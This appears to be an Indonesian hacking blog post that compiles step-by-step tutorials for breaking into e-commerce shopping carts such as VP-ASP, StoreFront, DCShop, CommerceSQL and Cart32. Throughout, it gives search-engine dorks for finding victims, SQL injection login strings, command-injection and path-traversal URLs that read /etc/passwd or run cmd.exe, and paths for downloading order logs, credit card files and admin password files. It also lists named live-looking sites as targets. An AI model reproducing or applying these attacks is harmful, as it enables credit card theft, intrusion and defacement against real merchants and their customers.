Note : - dalam tulisan ini kita coba lakukan 2 metode.
- metode pertama masuk melalui halaman shopadmin.asp dengan metode SQL injection.
- metode kedua dengan cara mencari database file *.mdb dari file shopdbtest.asp
Metode Pertama :
---------------
1. mulai cari target situs dengan VP-ASP shopping Cart.
search in all search engine --> google, altavista, yahoo and etc.
contoh : allinurl:vp-asp or allinurl:shopadmin.asp
2. contoh kita dapat situs dengan vp-asp cart ---> www.target.com.
rumus manualnya seperti :
www.target.com/vp-asp dir/shopadmin.asp atau www.target.com/shopadmin.asp
note : tergantung dimana situs tersebut meletakan file shopadmin.asp
3. setelah berhasil mendapatkan url shopadmin.asp lalu kita inject SQL nya.
masukan login dan password injection nya.
contoh :
www.target.com/vp-asp dir/shopadmin.asp
login : 'or''=' atau login : admin
passwd : 'or''=' passwd : 'or''='
4. OK. kalo berhasil masuk kita akan melihat isi dari database admin.
seperti :
- Display Orders
- Display Producs
- Edit Orders
- dan lain-lain.
Metode kedua :
--------------
1. ketika injection falied maka kita coba download database nya :P~
2. rumus manualnya dengan shopdbtest.asp.
contoh :
www.target.com/vp-asp dir/shopdbtest.asp atau www.target.com/shopdbtest.asp
note : tergantung dimana situs tersebut meletakan file shopdbtest.asp
3. Jika beruntung kita akan mendapatkan informasi tentang database si admin :)
database berisi :
- xDatabase
- xDblocation
- xdatabasetype
- xEmail
- xEmailName
- xEmailSubject
- xEmailSystem
- xEmailType
- xOrdernumber
4. selanjutnya kita liat file dengan ex *.mdb berada.
caranya :
- xDatabase ---> untuk nama file *.mdb nya.
- xDblocation ---> untuk lokasi file *.mdb nya.
contoh :
- xDatabase = shopping200
- xDblocation = shop
display :
www.target.com/shop/shoping200.mdb
5. setalah itu file shoping200.mdb secara automatis akan terdownload :)
untuk melihat isi database shoping200.mdb kamu bisa membukanya dengan Ms Access.
6. Ok Thank's selamat mencoba....
Contoh target :
http://www.bossant.com.cn/shop/shopping.mdb
http://www.youngsliquors.com/winestore/shopping300.mdb
http://www.jinhuaham.com/newshop/shopping.mdb
http://www.vienna-plan.at/shopa/shopping.mdb
http://www.crystalacarte.com/shopdbtest.asp
http://www.mediablend.com/demos/ecommerce/mbstore/store/shopdbtest.asp
http://www.armoredplanet.com/vpshop/shopdbtest.asp
http://www.adventureropes.com/Shopping/shopdbtest.asp
http://www.4urbike.com/shopdbtest.asp
http://www.bottegadelleapi.com/SHOP/shopdbtest.asp
http://www.decathlon.com.tw/demo/shopdbtest.asp
NEXT -----> Search Again !!!!
Note : this is Storefront sql injection tested on 6.0 and older versions.
Begin :
- Search in your search engine a website that has storefront Shopping Cart.
- coz this is sql injection from login page so search code like :
e.g : allinurl:StoreFront+login+page or another combination :)
(1) found A Target like this:
http://www.target.com/login.asp or http://www.target.com/storedir/login.asp
(2) to have then access to the first user in database structure.
If an attacker knew any email address of a registered user,
it'll be possible for him to retrieve the registered uses's information from this login page.
(3) and now example for injection to login.asp
e.g : http://www.target.com/login.asp
login : example@example.com --> or u have a registered email id in that site.
passwd : ' or 'a'='a
The ShopPlus shopping cart system allows you to build a store or a mall on the Internet.
Because of its flexibility, it allows you to sell virtually any product or services and
fully customize the shopping experience of your web site.
Owner :
http://www.ksofttech.com/help/shopplus/
Problem:
Script doesnt check symbols. any user can execute commands on webserver.
Exploit:
http://target.com/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
http://target.com/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
Thank's
Bugs File : admin page --> /admin
Display : http://target.com/s-cart/admin
1. search in all search engine e.g --> allinurl:s-cart/index.phtml or "s-cart"
2. Get the target site like --> http://www.target.com/s-cart/index.phtml
3. and now go to admin page with change the Url to :
http://www.target.com/s-cart/admin --> auto open browser with login and passwd !!!
login : admin
passwd : 'or''='
4. If U are lucky, u can see the admin manager, show the table Order now or Deface s-cart page.
Ok let's to try :P~
caranya :
1. kamu bisa saja mencoba dengan mengetikan "PDG_Cart" pada search engine.
setelah dapat situs yang memakai PDG_Cart.
CONTOH:
www.target.com/cgi-bin/PDG_Cart
2. lalu loe ketik aja bugsnya untuk mendapatkan login dan password MERCHANT
seperti :
-order.log
-shopper.conf
-Auth.log
-Auth_Admin.log
-authorizenet.log
-dll.
contoh : www.target.com/cgi-bin/PDG_Cart/shopper.conf
MIDICART is s an ASP and PHP based shopping Cart application with MS Access and SQL database.
A security vulnerability in the product allows remote attackers to download the product's
database, thus gain access to sensitive information about users of the product
(name, surname, address, e-mail, phone number, credit card number, and company name).
Example:
Accessing the following URL will return the database used by the product:
http://www.target.com/shoppingdirectory/midicart.mdb
e.g :
http://www.cc200.com/branches/pes/midicart/shop/midicart.mdb
So Download Now !!!
Thank's
caranya : kamu cari di semua search engine
1. kamu bisa saja mencoba dengan mengetikan "mall2000.cgi" pada
search engine. atau melihatnya dari http://www.ezmall2000.com/
setelah dapat situs yang memakai mall2000.cgi
CONTOH:
http://www.lexicom.ab.ca/cgi-bin/ezmall2000b/mall2000.cgi?
2. nah langkah kedua loe ketik aja " &page=../ "
kayak gituh seperti ini.
contoh :
http://www.lexicom.ab.ca/cgi-bin/ezmall2000b/mall2000.cgi?&page=../
3. lalu loe ketik aja bugsnya untuk mendapatkan list data ato
Credit Card hasil dari transaksi di situs tersebut.
seperti :
-order.log
-error.log
-access.log
-dll.
contoh :
http://www.lexicom.ab.ca/cgi-bin/ezmall2000b/mall2000.cgi?&page=../order.log
4. setelah dapet jangan teriak keras2 nanti ketahuan sama temen-temen elo
saran gua loe sering sering mencoba ajah OK.
5. baca tutorial yang shopping cart lain juga.
6. THANK"S
Bugs File : /forumcgi/display.cgi?
Display : http://www.target.com/encore/forumcgi/display.cgi?
1. search in all search engine e.g --> allinurl:forumcgi/display.cgi?
2. Get the target site like --> http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp
3. and now go to the exploit with insert this code :
&page=anonymous&file=|uname%20-a|
4. Full Display like :
http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname%20-a|
5. Linux or Unix command available in here... Good Luck :P~
Sebelum mencari bugs pada DCShop
Loe harus tarik napas dolo panjang panjang ok.Nah begini caranyah :
1. Buka search engine (www.altavista.com atau www.google.com)
2. Masukkan keyword nya 'url:DCShop'
maka search engine tersebut akan mencari semua links
yang mempunyai links yang ada DCShop nya.
3. Misalkan loe dapet url nyah :
http://theTargetHost/cgi-bin/DCShop/
4. maka untuk mendapatkan list CC dan daftar belanja dari site tersebut
loe tinggal tambahin aja di belakangnya :
"Orders/orders.txt"
lengkapnya menjadi :
http://theTargetHost/cgi-bin/DCShop/Orders/orders.txt
5. selanjutnya loe dapet juga mencari daftar nama administrator
dan passwordnya dengan menambahkan keyword :
"Auth_data/auth_user_file.txt"
lengkapnya menjadi :
http://theTargetHost/cgi-bin/DCShop/Auth_data/auth_user_file.txt
6. OK ini dulu yah.... selamat mencoba.............
I am Just a KID.
I just want to know about this shopping Cart.
CommerceSQL shopping cart use PERL script for Proccesing Data or Order.
you can see more information about commerceSQL shopping Cart in
http://commercesql.com.
I have knew the full path from / the base directory or the path of
files
starting the folder in which index.cgi resides.
Begin :
Search in your search engine a website that has CommerceSQL Shopping
Cart.
(1) found A Target like this:
http://www.target.com/cgi-bin/commerceSQL/index.cgi
Anyway what useful files I've found so far are : ?page=../index.cgi
example:
http://www.target.com/cgi-bin/commerceSQL/index.cgi?page=../index.cgi
(2) this is the file where you will find the paths to the shop admin
files:
?page=../admin/manager.cgi
example :
http://www.target.com/cgi-bin/commerceSQL/index.cgi?page=../admin/manager.cgi
(3) this is the file where you will find the paths to the admin configuration file,
and this is where you'll find the database file name, username and
password to access it :
?page=../admin/admin_conf.pl
or
?page=../admin/configuration.pl
?page=../admin/admin_conf.pl
?page=../admin/html_lib.pl
example :
http://www.target.com/cgi-bin/commerceSQL/index.cgi?page=../admin/admin_conf.pl
(4) this is the file where you will find the paths to the Order log :
?page=../admin/files/order.log
example :
http://www.target.com/cgi-bin/commerceSQL/index.cgi?page=../admin/files/order.log
(5) Good Luck !!! and sorry my english is bad :P
Recently there are many hacking attempts attacking E-commerce site
that use CCBILL to precess credit cards. Some of my clients sites are
hacked and defaced by this vulnerability. In the Incidents List,
some people already mention about it. I just take a look at the
actual problem and figure out that the vulnerability is at the whereami.cgi
in the /ccbill/ directory. That script allow attackers to run commands
without authorization.
Example :
http://victimhost/ccbill/whereami.cgi?g=cat%20../../../../etc/password
Thank's
NB : Hanya bisa digunakan kepada beberapa situs yang memiliki kelemahan
yang sama.
Langkah 1: Dapatkan terlebih dahulu Website Cart32 v3.5a
Langkah 2: Cari di semua searc engine yang kamu ketahui.
dengan keyword " Cart32 v3.5a "
Langkah 3: Masuk ke website Cart32.exe
http://target/login/unicode/cart32.exe
(contoh : http://www.connectionsmall.com/scripts/cart32.exe/)
Langkah 4: Setelah kamu masuk kesana, akan diperlihatkan tampilan
seperti dibawah ini :
Cart32 v3.5a
Langkah 4: Sekarang yang harus kamu lakukan adalah memasukkan ekstensi
berikut di akhir URL, 98% memakai #1 & #2
a. (..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)
b. (..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\)
c. (..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\)
HANYA DIGUNAKAN KADANG2!
(contoh:http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)
Langkah 5: Saat kamu berada di direktori utama (c:\), untuk masuk ke
cc's, masukan kembali (\progra~1\MWAInc\Cart32\) ke akhir URL tadi
sehingga sekarang kamu dapat melihat seperti :
http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\
Sekarang kamu dapat melihat banyak file seperti :
2814659000-001001.c32
2814659000-001002.c32
2814659000-001003.c32
Langkah 6: Copy salah satu dari nama file tersebut dan kemudian
masukkan ke akhir URL, dan akan terlihat seperti : http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\2814659000-001003.c32
Catatan : Diistu kamu akan melihat file lain yang berisi banyak sekali
cc's seperti :
RONACK-orders.txt (file ini tidak berada pada situs yang khusus ini)
procure-orders.txt (file ini tidak berada pada situs yang khusus ini)
Langkah 7: Sebelum kamu mengakses tipe file yang lain, pertama kamu harus mengganti
*c+dir+c:\* ke *c+type+c:\*
TUTORIAL II : Cart32 v3.5a
Target: http://www.partybows.com
1. Ke http://www.partybows.com
2. Klik http://www.partybows.com/seasonal.htm
3. Isi Quantity= 1 Pokoknya kayak lu pura2x beli dan klik order
4. Maka akan kesini jadinya :
https://secure.axionet.com/partybows/cgi-bin/cart32.exe/partybows-AddItem
5. Ubah menjadi
https://secure.axionet.com/partybows/cgi-bin/cart32.exe/error
Cart32 v3.5 Error
CART32 Build 619
The following internal error has occurred: Invalid procedure
Error Number = 5
Click Here For Possible Solutions
etc.
6. Cari log order-nya
Cart32 Setup Info and Directory
Mail Server = mail.axion.net Section=Main
AdminDir = D:\secure\webroot\partybows\cgi-bin\cart32\
Jadi partybows-orders.txt.
Sehingga akhirnya :
http://www.partybows.com/cgi-bin/cart32/partybows-orders.txt
7. Atau untuk mendapatkan Password admin nyah loe tinggak ketik cart32.ini
https://secure.axionet.com/partybows/cgi-bin/cart32.ini
dengan tidak di sengaja kamu akan mendownload Password admin
yang ada di file cart32.ini nyah.
kamu akan mendapat kan password admin yang terencriptsi
lalu kamu coba mendecriptkan nyah dengan software
" Cart32decoder.exe "
8. Untuk mendapatkan data nama dan password clients pada Cart32
kamu bisa mencobanya dengan mengetik "CLIENT.DBF"
atau :
order file pada "ORDER atau ORDERS.DBF
TUTORIAL III : Cart32 v3.5a
search +/scripts/cart32.exe/
Exploitable Directories
-/scripts/cart32.ini
-/scripts/cart32.exe
-/scripts/cart32.exe/cart32clientlist
-/script/c32web.exe/ChangeAdminPassword
-/scripts/c32web.exe
-cgi-shl/c32web.exe/
Wherever there is the cart32.exe add this to the end of it /cart32clientlist
and erase the rest a menu will come up with a submit box click go
it will list ALL clients and their passwords passwords will be encrypted
after decrypting the password, go to wherever the [c32web.exe] file is
thats the instructions wit exploits what that channel we were just in called
1 comments:
Pusing bang :v
Post a Comment